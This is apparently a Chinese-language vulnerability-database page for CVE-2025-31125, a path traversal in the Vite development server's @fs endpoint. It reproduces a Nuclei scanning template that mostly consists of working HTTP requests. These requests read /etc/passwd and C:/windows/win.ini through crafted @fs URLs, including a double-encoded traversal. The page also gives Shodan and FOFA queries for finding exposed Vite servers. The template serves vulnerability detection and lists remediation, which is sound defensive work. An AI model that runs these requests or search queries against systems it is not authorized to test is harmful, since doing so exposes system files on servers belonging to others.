CVE-2025-31125: Vite Development Server - Path Traversal

日期: 2025-08-01 | 影响软件: Vite Development Server | POC: 已公开

漏洞描述

Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.

PoC代码[已公开]

id: CVE-2025-31125

info:
  name: Vite Development Server - Path Traversal
  author: martian,ritikchaddha,v2htw
  severity: medium
  description: |
    Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.
  remediation: |
    Upgrade to the patched version or avoid exposing the Vite development server to the network (do not use --host flag or configure server.host); if upgrading is not immediately possible, implement access restrictions to the Vite development server
  reference:
    - https://github.com/vitejs/vite/issues/8498
    - https://github.com/vitejs/vite/pull/8804
    - https://github.com/vitejs/vite/pull/8979
    - https://nvd.nist.gov/vuln/detail/CVE-2025-31125
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-31125
    epss-score: 0.06978
    epss-percentile: 0.91088
    cwe-id: CWE-200
  metadata:
    verified: true
    max-requests: 4
    shodan-query: title:"Vite App"
    fofa-query: title="Vite App"
  tags: cve,cve2025,vite,lfi,vkev

http:
  - raw:
      - |
        GET /@fs/C:/windows/win.ini?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/../../../../../../../etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/%252e%252e/%252e%252e/%252e%252e/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "data:application/octet-stream"
          - "base64"
          - "import init"
        condition: and

      - type: word
        part: header
        words:
          - "text/javascript"
# digest: 4b0a00483046022100b9052e65d6c1f23a0bb7cd6037e06c20e00d825a29bae95a4a2b8eff84077815022100cd484d872094aad9624788c8fa21663d062b31c9f3538d4d67744a57930e842c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-31125.yaml

相关漏洞推荐